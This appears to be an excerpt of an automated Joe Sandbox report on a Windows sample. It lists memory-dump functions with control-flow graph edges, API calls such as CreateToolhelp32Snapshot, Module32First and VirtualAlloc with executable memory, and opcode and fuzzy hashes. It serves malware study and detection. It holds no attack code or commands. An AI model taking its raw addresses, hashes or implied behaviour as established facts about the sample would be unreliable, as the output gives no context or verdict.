                    control_flow_graph 41 7b97c6-7b97df 42 7b97e1-7b97e3 41->42 43 7b97ea-7b97f6 CreateToolhelp32Snapshot 42->43 44 7b97e5 42->44 45 7b97f8-7b97fe 43->45 46 7b9806-7b9813 Module32First 43->46 44->43 45->46 53 7b9800-7b9804 45->53 47 7b981c-7b9824 46->47 48 7b9815-7b9816 call 7b9485 46->48 51 7b981b 48->51 51->47 53->42 53->46
                    APIs
                    • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 007B97EE
                    • Module32First.KERNEL32(00000000,00000224), ref: 007B980E
                    Memory Dump Source
                    • Source File: 0000000A.00000002.1345421470.00000000007B9000.00000040.00000020.00020000.00000000.sdmp, Offset: 007B9000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_7b9000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Yara matches
                    Similarity
                    • API ID: CreateFirstModule32SnapshotToolhelp32
                    • String ID:
                    • API String ID: 3833638111-0
                    • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                    • Instruction ID: b4d7bb83bf1a84a9e5fe019da7ce8e2879300cbba27e03dc360367bd30a7d997
                    • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                    • Instruction Fuzzy Hash: 7DF09631200710AFD7203FF5A88DBAF76ECAF89725F100628E756910C0DB74EC454661
                    Function 007B9485 Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 54 7b9485-7b94bf call 7b9798 57 7b950d 54->57 58 7b94c1-7b94f4 VirtualAlloc call 7b9512 54->58 57->57 60 7b94f9-7b950b 58->60 60->57
                    APIs
                    • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 007B94D6
                    Memory Dump Source
                    • Source File: 0000000A.00000002.1345421470.00000000007B9000.00000040.00000020.00020000.00000000.sdmp, Offset: 007B9000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_7b9000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Yara matches
                    Similarity
                    • API ID: AllocVirtual
                    • String ID:
                    • API String ID: 4275171209-0
                    • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                    • Instruction ID: da7091cb2089c45dedff53771fdd051defd06052a44d492f7a03164f58c7c125
                    • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                    • Instruction Fuzzy Hash: B8113C79A40208EFDB01DF98C985E99BBF5EF08350F058094FA589B362D775EA90DF90

                    Non-executed Functions

                    Function 02336437 Relevance: 18.1, APIs: 12, Instructions: 84COMMONLIBRARYCODE
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 552 2336437-2336440 553 2336442-2336446 552->553 554 2336466 552->554 553->554 555 2336448-2336459 call 2339636 553->555 556 2336468-233646b 554->556 559 233645b-2336460 call 2335ba8 555->559 560 233646c-233647d call 2339636 555->560 559->554 565 2336488-233649a call 2339636 560->565 566 233647f-2336480 call 233158d 560->566 571 23364ac-23364cd call 2335f4c call 2336837 565->571 572 233649c-23364aa call 233158d * 2 565->572 569 2336485-2336486 566->569 569->559 581 23364e2-2336500 call 233158d call 2334edc call 2334d82 call 233158d 571->581 582 23364cf-23364dd call 233557d 571->582 572->569 590 2336507-2336509 581->590 587 2336502-2336505 582->587 588 23364df 582->588 587->590 588->581 590->556
                    APIs
                    Memory Dump Source
                    • Source File: 0000000A.00000002.1346549601.0000000002310000.00000040.00001000.00020000.00000000.sdmp, Offset: 02310000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_2310000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free$__calloc_crt$___freetlocinfo___removelocaleref__calloc_impl__copytlocinfo_nolock__setmbcp_nolock
                    • String ID:
                    • API String ID: 1442030790-0
                    • Opcode ID: 6bd5cc8f3dd8ebf785cdc17837931ce977b5cf0fd4524e89a9393df48daa8713
                    • Instruction ID: 172c8bc943ff68534b2b73c1a69edb907f107de6ba382d79690c76ec30188360
                    • Opcode Fuzzy Hash: 6bd5cc8f3dd8ebf785cdc17837931ce977b5cf0fd4524e89a9393df48daa8713
                    • Instruction Fuzzy Hash: 0121C036604600FEEB337F65DC02E4B7BEEDF41771B508029E589554A4EB628750CF58
                    Function 02333F16 Relevance: 16.8, APIs: 11, Instructions: 258COMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 596 2333f16-2333f2f 597 2333f31-2333f3b call 2335ba8 call 2334c72 596->597 598 2333f49-2333f5e call 233bdc0 596->598 607 2333f40 597->607 598->597 604 2333f60-2333f63 598->604 605 2333f77-2333f7d 604->605 606 2333f65 604->606 610 2333f89-2333f9a call 2340504 call 23401a3 605->610 611 2333f7f 605->611 608 2333f67-2333f69 606->608 609 2333f6b-2333f75 call 2335ba8 606->609 612 2333f42-2333f48 607->612 608->605 608->609 609->607 620 2333fa0-2333fac call 23401cd 610->620 621 2334185-233418f call 2334c9d 610->621 611->609 614 2333f81-2333f87 611->614 614->609 614->610 620->621 626 2333fb2-2333fbe call 23401f7 620->626 626->621 629 2333fc4-2333fcb 626->629 630 233403b-2334046 call 23402d9 629->630 631 2333fcd 629->631 630->612 637 233404c-233404f 630->637 633 2333fd7-2333ff3 call 23402d9 631->633 634 2333fcf-2333fd5 631->634 633->612 641 2333ff9-2333ffc 633->641 634->630 634->633 639 2334051-233405a call 2340554 637->639 640 233407e-233408b 637->640 639->640 649 233405c-233407c 639->649 643 233408d-233409c call 2340f40 640->643 644 2334002-233400b call 2340554 641->644 645 233413e-2334140 641->645 652 23340a9-23340d0 call 2340e90 call 2340f40 643->652 653 233409e-23340a6 643->653 644->645 654 2334011-2334029 call 23402d9 644->654 645->612 649->643 662 23340d2-23340db 652->662 663 23340de-2334105 call 2340e90 call 2340f40 652->663 653->652 654->612 659 233402f-2334036 654->659 659->645 662->663 668 2334113-2334122 call 2340e90 663->668 669 2334107-2334110 663->669 672 2334124 668->672 673 233414f-2334168 668->673 669->668 676 2334126-2334128 672->676 677 233412a-2334138 672->677 674 233413b 673->674 675 233416a-2334183 673->675 674->645 675->645 676->677 678 2334145-2334147 676->678 677->674 678->645 679 2334149 678->679 679->673 680 233414b-233414d 679->680 680->645 680->673
                    APIs
                    • _memset.LIBCMT ref: 02333F51
                      • Part of subcall function 02335BA8: __getptd_noexit.LIBCMT ref: 02335BA8
                    • __gmtime64_s.LIBCMT ref: 02333FEA
                    • __gmtime64_s.LIBCMT ref: 02334020
                    • __gmtime64_s.LIBCMT ref: 0233403D
                    • __allrem.LIBCMT ref: 02334093
                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 023340AF
                    • __allrem.LIBCMT ref: 023340C6
                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 023340E4
                    • __allrem.LIBCMT ref: 023340FB
                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02334119
                    • __invoke_watson.LIBCMT ref: 0233418A
                    Memory Dump Source
                    • Source File: 0000000A.00000002.1346549601.0000000002310000.00000040.00001000.00020000.00000000.sdmp, Offset: 02310000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_2310000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Yara matches
                    Similarity
                    • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                    • String ID:
                    • API String ID: 384356119-0
                    • Opcode ID: 7fd9d583014fb9bd54c3649c392eeadef0098b2c5eee71df52b0c12f16343c62
                    • Instruction ID: ee816ebf79beab13977ceea21178072d1bee1ea25000f8ca795a676bf6d84ac8
                    • Opcode Fuzzy Hash: 7fd9d583014fb9bd54c3649c392eeadef0098b2c5eee71df52b0c12f16343c62
                    • Instruction Fuzzy Hash: 4471DA71B00B16ABD7299F79CC41B6AB3F9AF10764F144279E614E7680EB70EB408BD0
                    Function 0233650E Relevance: 16.6, APIs: 11, Instructions: 131COMMONLIBRARYCODE
                    Download Yara Rule

                    Control-flow Graph

                    APIs
                    Memory Dump Source
                    • Source File: 0000000A.00000002.1346549601.0000000002310000.00000040.00001000.00020000.00000000.sdmp, Offset: 02310000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_2310000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Yara matches
                    Similarity
                    • API ID: Ex_nolock__lock__updatetlocinfo$___removelocaleref__calloc_crt__copytlocinfo_nolock__invoke_watson_wcscmp
                    • String ID:
                    • API String ID: 3432600739-0
                    • Opcode ID: 7aa5c98289f18997e9299cf2a82b2e33c44f00e8491ec962a9d4b764f8744340
                    • Instruction ID: e5e486ec1b629441cdb41ddd18744e31ff9bcc93e69d14b17bbd0beec632e568
                    • Opcode Fuzzy Hash: 7aa5c98289f18997e9299cf2a82b2e33c44f00e8491ec962a9d4b764f8744340
                    • Instruction Fuzzy Hash: DD412372904304BFDB22AFA4DD82B9E7BFAAF48324F10402DFA0496190CB759744DF19
                    Function 023384AB Relevance: 16.6, APIs: 11, Instructions: 92COMMONLIBRARYCODE
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 745 23384ab-23384d9 call 2338477 750 23384f3-233850b call 233158d 745->750 751 23384db-23384de 745->751 757 2338524-233855a call 233158d * 3 750->757 758 233850d-233850f 750->758 752 23384e0-23384eb call 233158d 751->752 753 23384ed 751->753 752->751 752->753 753->750 770 233856b-233857e 757->770 771 233855c-2338562 757->771 760 2338511-233851c call 233158d 758->760 761 233851e 758->761 760->758 760->761 761->757 776 2338580-2338587 call 233158d 770->776 777 233858d-2338594 770->777 771->770 772 2338564-233856a call 233158d 771->772 772->770 776->777 779 23385a3-23385ae 777->779 780 2338596-233859d call 233158d 777->780 783 23385b0-23385bc 779->783 784 23385cb-23385cd 779->784 780->779 783->784 786 23385be-23385c5 call 233158d 783->786 786->784
                    APIs
                    Memory Dump Source
                    • Source File: 0000000A.00000002.1346549601.0000000002310000.00000040.00001000.00020000.00000000.sdmp, Offset: 02310000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_2310000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free$ExitProcess___crt
                    • String ID:
                    • API String ID: 1022109855-0
                    • Opcode ID: 351ddd14b24f1e3a4d385d89d907221036510e379468225c84414e37ce72688f
                    • Instruction ID: 101903d3c43d2ed71891bdc9135165d9642781c189e87278751d8bd9b66fc443
                    • Opcode Fuzzy Hash: 351ddd14b24f1e3a4d385d89d907221036510e379468225c84414e37ce72688f
                    • Instruction Fuzzy Hash: E3318433A00254DBEF235F54FC8484977A6FB14325704862AF949572B0CBF45BC9AF94
                    Function 0235FC0C Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 58COMMON
                    Download Yara Rule
                    APIs
                    • std::exception::exception.LIBCMT ref: 0235FC1F
                      • Part of subcall function 0234169C: std::exception::_Copy_str.LIBCMT ref: 023416B5
                    • __CxxThrowException@8.LIBCMT ref: 0235FC34
                    • std::exception::exception.LIBCMT ref: 0235FC4D
                    • __CxxThrowException@8.LIBCMT ref: 0235FC62
                    • std::regex_error::regex_error.LIBCPMT ref: 0235FC74
                      • Part of subcall function 0235F914: std::exception::exception.LIBCMT ref: 0235F92E
                    • __CxxThrowException@8.LIBCMT ref: 0235FC82
                    • std::exception::exception.LIBCMT ref: 0235FC9B
                    • __CxxThrowException@8.LIBCMT ref: 0235FCB0
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.1346549601.0000000002310000.00000040.00001000.00020000.00000000.sdmp, Offset: 02310000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_2310000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Yara matches
                    Similarity
                    • API ID: Exception@8Throwstd::exception::exception$Copy_strstd::exception::_std::regex_error::regex_error
                    • String ID: leM
                    • API String ID: 3569886845-2926266777
                    • Opcode ID: ed214ebb3701571be2f43069d920533da395f334550e3d3fd8b3428f3c6f404b
                    • Instruction ID: f9337cfde3ade37b34b049770b04270b2e7fb50faa943ac7cfbde6bd1e3db0b8
                    • Opcode Fuzzy Hash: ed214ebb3701571be2f43069d920533da395f334550e3d3fd8b3428f3c6f404b
                    • Instruction Fuzzy Hash: 9C11EC79C0060DBBCF00FFA5D455CDDBBBDAA04344B4085A6AD5897640EB74E3888F94
                    Function 0231F010 Relevance: 15.1, APIs: 10, Instructions: 78COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 0000000A.00000002.1346549601.0000000002310000.00000040.00001000.00020000.00000000.sdmp, Offset: 02310000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_2310000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free_malloc_wprintf$_sprintf
                    • String ID:
                    • API String ID: 3721157643-0
                    • Opcode ID: 02ca39b803bb7accc6b95a63f2f9baed07ed6e7a95ba34453850edf5138b640f
                    • Instruction ID: 55322500b169ead389d2e9d59dcb3d6320b70aa76a7bc2fd4ae3fd4962b05556
                    • Opcode Fuzzy Hash: 02ca39b803bb7accc6b95a63f2f9baed07ed6e7a95ba34453850edf5138b640f
                    • Instruction Fuzzy Hash: 421121B2A006642AD272A3F40C11EFF7AED9F46702F0800A9FE8DD1180EB585B049BB1
                    Function 02321960 Relevance: 13.6, APIs: 9, Instructions: 149COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 0000000A.00000002.1346549601.0000000002310000.00000040.00001000.00020000.00000000.sdmp, Offset: 02310000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_2310000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Yara matches
                    Similarity
                    • API ID: Exception@8Throw$_memset$_malloc_sprintf
                    • String ID:
                    • API String ID: 65388428-0
                    • Opcode ID: 76dd775f958ae6873f0575faef2ecf56324248e316e82f6433bbffcf9f7903c6
                    • Instruction ID: 02c063fcb904e8d92f877cb156ab129af9b578cb0cf98879b409464b250dccf1
                    • Opcode Fuzzy Hash: 76dd775f958ae6873f0575faef2ecf56324248e316e82f6433bbffcf9f7903c6
                    • Instruction Fuzzy Hash: AD518C71D40219ABDB21DBA1DD86FEFBBB9FF04704F100025F949B6190EB746A058BA5
                    Function 0231F210 Relevance: 10.7, APIs: 7, Instructions: 165COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 0000000A.00000002.1346549601.0000000002310000.00000040.00001000.00020000.00000000.sdmp, Offset: 02310000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_2310000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Yara matches
                    Similarity
                    • API ID: Exception@8Throw$_memset_sprintf
                    • String ID:
                    • API String ID: 217217746-0
                    • Opcode ID: 3deed8c6e3840860115ea43936f1cfce13c92bcc70370307f91e5f5c9cd17acd
                    • Instruction ID: 566b06e429dae41069ed47a5f8ab304943c7c5f775ab3717c24e8c6fbdc26a32
                    • Opcode Fuzzy Hash: 3deed8c6e3840860115ea43936f1cfce13c92bcc70370307f91e5f5c9cd17acd
                    • Instruction Fuzzy Hash: 7D514DB1E40209AADF15DFA1DC46FEEBBB9EB04704F104029F905B6190DB75AA058BA5
                    Function 0231F440 Relevance: 10.7, APIs: 7, Instructions: 159COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 0000000A.00000002.1346549601.0000000002310000.00000040.00001000.00020000.00000000.sdmp, Offset: 02310000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_2310000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Yara matches
                    Similarity
                    • API ID: Exception@8Throw$_memset_sprintf
                    • String ID:
                    • API String ID: 217217746-0
                    • Opcode ID: 16aaa772ddb988d461e4337924cf716956fc1cb963719ed600faa1ffd715582e
                    • Instruction ID: 6c00346d093dc67c338fb24f9bf65b641234f847eaf6df5fe9b893d3450e911f
                    • Opcode Fuzzy Hash: 16aaa772ddb988d461e4337924cf716956fc1cb963719ed600faa1ffd715582e
                    • Instruction Fuzzy Hash: 6F515E71E40209ABDF25DFA1DC46FEEBBB9FF04704F100129F905B6180EB74AA058BA4
                    Function 0235208B Relevance: 9.1, APIs: 6, Instructions: 112COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 0000000A.00000002.1346549601.0000000002310000.00000040.00001000.00020000.00000000.sdmp, Offset: 02310000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_2310000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Yara matches
                    Similarity
                    • API ID: __getenv_helper_nolock$__getptd_noexit__invoke_watson__lock_strlen_strnlen
                    • String ID:
                    • API String ID: 3534693527-0
                    • Opcode ID: 7b5cd30b09028c4688c7add7ba7a2b705b2aa5fc65eb7c357d53e3922a347f5d
                    • Instruction ID: e6fbd86d798bda4fea9a1ce2db8678d7e6034dc582a7b91e3a69fb3b5cee23cd
                    • Opcode Fuzzy Hash: 7b5cd30b09028c4688c7add7ba7a2b705b2aa5fc65eb7c357d53e3922a347f5d
                    • Instruction Fuzzy Hash: DA31D272A01235ABDB326B64DC00FAF7BA99F05B64F104415FE0CEB284DB788641CBA1
                    Function 023D66D9 Relevance: 9.1, APIs: 6, Instructions: 100COMMON
                    Download Yara Rule
                    APIs
                    • __getptd_noexit.LIBCMT ref: 023D66DD
                      • Part of subcall function 023359BF: __calloc_crt.LIBCMT ref: 023359E2
                      • Part of subcall function 023359BF: __initptd.LIBCMT ref: 02335A04
                    • __calloc_crt.LIBCMT ref: 023D6700
                    • __get_sys_err_msg.LIBCMT ref: 023D671E
                    • __invoke_watson.LIBCMT ref: 023D673B
                    • __get_sys_err_msg.LIBCMT ref: 023D676D
                    • __invoke_watson.LIBCMT ref: 023D678B
                    Memory Dump Source
                    • Source File: 0000000A.00000002.1346549601.0000000002310000.00000040.00001000.00020000.00000000.sdmp, Offset: 02310000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_2310000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Yara matches
                    Similarity
                    • API ID: __calloc_crt__get_sys_err_msg__invoke_watson$__getptd_noexit__initptd
                    • String ID:
                    • API String ID: 4066021419-0
                    • Opcode ID: 560737a3d48f69e2c1bbacaa64e20750b253c0be39bebdd764001766347183bc
                    • Instruction ID: 87f9fabdfd59e0a852245f9ed282d048907200e90afc49cbb7affc178fd56e38
                    • Opcode Fuzzy Hash: 560737a3d48f69e2c1bbacaa64e20750b253c0be39bebdd764001766347183bc
                    • Instruction Fuzzy Hash: 2E11C1736016187BEB327B25BC42BAA739DEF047A0F000426FE28A6641E725DA004EE4
                    Function 02322670 Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 382COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.1346549601.0000000002310000.00000040.00001000.00020000.00000000.sdmp, Offset: 02310000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_2310000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Yara matches
                    Similarity
                    • API ID: _memset
                    • String ID: D
                    • API String ID: 2102423945-2746444292
                    • Opcode ID: dedb8dcdcede06716d2048126f6c935cbca30f7ec4e51b62ea2b6cedae773fd8
                    • Instruction ID: 19feb84e44476b5f61a47fa7d3824889a4aa495c2de3edc878f0dd9d9e06dfc6
                    • Opcode Fuzzy Hash: dedb8dcdcede06716d2048126f6c935cbca30f7ec4e51b62ea2b6cedae773fd8
                    • Instruction Fuzzy Hash: 77E14C71D00229AADF24DBA0DD49FEFB7B9BF04304F144069EA09E6590EB74AA49CF54
                    Function 0231D8B0 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 228COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.1346549601.0000000002310000.00000040.00001000.00020000.00000000.sdmp, Offset: 02310000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_2310000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Yara matches
                    Similarity
                    • API ID: _memset
                    • String ID: $$$(
                    • API String ID: 2102423945-3551151888
                    • Opcode ID: d910fc5c6766dfc0bc4f58c39da0494fd508bff05af182706436a08bc08c5056
                    • Instruction ID: afa0e67791a1fedca9468a463c68d589410b93dd660e544feca9db4b577375d6
                    • Opcode Fuzzy Hash: d910fc5c6766dfc0bc4f58c39da0494fd508bff05af182706436a08bc08c5056
                    • Instruction Fuzzy Hash: A091CF71D0025CAAEF25CFA0CC49BEEBBB5AF06304F148069D506B72C1DBB65A48CF65
                    Function 02335CE1 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 91COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.1346549601.0000000002310000.00000040.00001000.00020000.00000000.sdmp, Offset: 02310000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_2310000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Yara matches
                    Similarity
                    • API ID: _wcsnlen
                    • String ID: U
                    • API String ID: 3628947076-3372436214
                    • Opcode ID: ddbdfe4e8834e254b395da421ec3c28ac3be050359a4b81b0499ab3bd56dfaa9
                    • Instruction ID: b11f20445d866073b9a4157611bce2cf5397da0504c6af400ecb3be06139ce6b
                    • Opcode Fuzzy Hash: ddbdfe4e8834e254b395da421ec3c28ac3be050359a4b81b0499ab3bd56dfaa9
                    • Instruction Fuzzy Hash: 5E21EB32614308BEEB119BA49C45BBE73ADDB49761F904165F908CA190FB71EB408AA4
                    Function 0232A810 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 22COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.1346549601.0000000002310000.00000040.00001000.00020000.00000000.sdmp, Offset: 02310000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_2310000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Yara matches
                    Similarity
                    • API ID: _memset
                    • String ID: p2Q
                    • API String ID: 2102423945-1521255505
                    • Opcode ID: 46ecb9121aab2c4594d1f343841fc1340943ec8095ce101e3444a0aa36bfb78c
                    • Instruction ID: 9b6f7632d74a293069f366eac188ad4c9410bd2d18dae30b5f184510db8fdf58
                    • Opcode Fuzzy Hash: 46ecb9121aab2c4594d1f343841fc1340943ec8095ce101e3444a0aa36bfb78c
                    • Instruction Fuzzy Hash: 7AF0E578694790A5F7217B50BC267857D927B31B08F104045D1142E2E1D3FD234C6799
                    Function 0235FBDE Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15COMMON
                    Download Yara Rule
                    APIs
                    • std::exception::exception.LIBCMT ref: 0235FBF1
                      • Part of subcall function 0234169C: std::exception::_Copy_str.LIBCMT ref: 023416B5
                    • __CxxThrowException@8.LIBCMT ref: 0235FC06
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.1346549601.0000000002310000.00000040.00001000.00020000.00000000.sdmp, Offset: 02310000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_2310000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Yara matches
                    Similarity
                    • API ID: Copy_strException@8Throwstd::exception::_std::exception::exception
                    • String ID: TeM$TeM
                    • API String ID: 3662862379-3870166017
                    • Opcode ID: 96199cc15ff6b6db5c9edb5d1ae12cb70dd59b1139974201ea7fd9c915f9b6e6
                    • Instruction ID: 67aecc605eca34ad52cd1d062127c40f79b2256436c0aae87e6e6f32faf87050
                    • Opcode Fuzzy Hash: 96199cc15ff6b6db5c9edb5d1ae12cb70dd59b1139974201ea7fd9c915f9b6e6
                    • Instruction Fuzzy Hash: D0D067B5C0020CBBCB00EFA5D459CDDBBB9AA04344B0084A6AD5897241EA74E3898F94
                    Function 0231D0E0 Relevance: 6.3, APIs: 4, Instructions: 254COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 0233197D: __wfsopen.LIBCMT ref: 02331988
                    • _fgetws.LIBCMT ref: 0231D15C
                    Memory Dump Source
                    • Source File: 0000000A.00000002.1346549601.0000000002310000.00000040.00001000.00020000.00000000.sdmp, Offset: 02310000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_2310000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Yara matches
                    Similarity
                    • API ID: __wfsopen_fgetws
                    • String ID:
                    • API String ID: 853134316-0
                    • Opcode ID: fb686944b339c976eacea12c72b2cba8865104c98ae0a1a06473ea49a68c22d9
                    • Instruction ID: 725bc4b622138aa7ce886cb3311c019710de2b5470127a1edffc5c58006230eb
                    • Opcode Fuzzy Hash: fb686944b339c976eacea12c72b2cba8865104c98ae0a1a06473ea49a68c22d9
                    • Instruction Fuzzy Hash: 4B91D372D1031D9BCF29DFA4CC847AEB7B5BF06304F140529E815A3240E776EA15CBA5
                    Function 0231D540 Relevance: 6.2, APIs: 4, Instructions: 240COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 0000000A.00000002.1346549601.0000000002310000.00000040.00001000.00020000.00000000.sdmp, Offset: 02310000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_2310000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Yara matches
                    Similarity
                    • API ID: _malloc$__except_handler4_fprintf
                    • String ID:
                    • API String ID: 1783060780-0
                    • Opcode ID: bc6d813e7e752583a03017172366884d0a88b051dc04778f03b6bdc3bc976eb1
                    • Instruction ID: 78df6c9611fbb97c6418814d5908038b4a108b63b07c21da4ba6e66d942de26d
                    • Opcode Fuzzy Hash: bc6d813e7e752583a03017172366884d0a88b051dc04778f03b6bdc3bc976eb1
                    • Instruction Fuzzy Hash: D6A14EB1C0025CEBEF25EFE4C849BEEBB76AF15308F144028D50576291D7B65A48CFA6
                    Function 02332AD0 Relevance: 6.2, APIs: 4, Instructions: 163COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 0000000A.00000002.1346549601.0000000002310000.00000040.00001000.00020000.00000000.sdmp, Offset: 02310000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_2310000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Yara matches
                    Similarity
                    • API ID: _memset$__filbuf__getptd_noexit__read_nolock
                    • String ID:
                    • API String ID: 2974526305-0
                    • Opcode ID: 7a4cfea45ad1cabaf48d6d85d658ec87b7d71ccae72904ede4351d6e655b18a3
                    • Instruction ID: ba72665ec8df62a519e9465af8eb769b6112f735f22892decb88b3ad73f15b89
                    • Opcode Fuzzy Hash: 7a4cfea45ad1cabaf48d6d85d658ec87b7d71ccae72904ede4351d6e655b18a3
                    • Instruction Fuzzy Hash: 9D518E70A0030A9BDB2A8F798C846AFB7B6AF40724F248729FC75966D0D7759F51CB40
                    Function 02351359 Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 0000000A.00000002.1346549601.0000000002310000.00000040.00001000.00020000.00000000.sdmp, Offset: 02310000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_2310000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Yara matches
                    Similarity
                    • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                    • String ID:
                    • API String ID: 3016257755-0
                    • Opcode ID: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
                    • Instruction ID: d8b20941608344fbcd590f5dfc039d10d7f71785d4f9b1ee60ca7db808991a89
                    • Opcode Fuzzy Hash: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
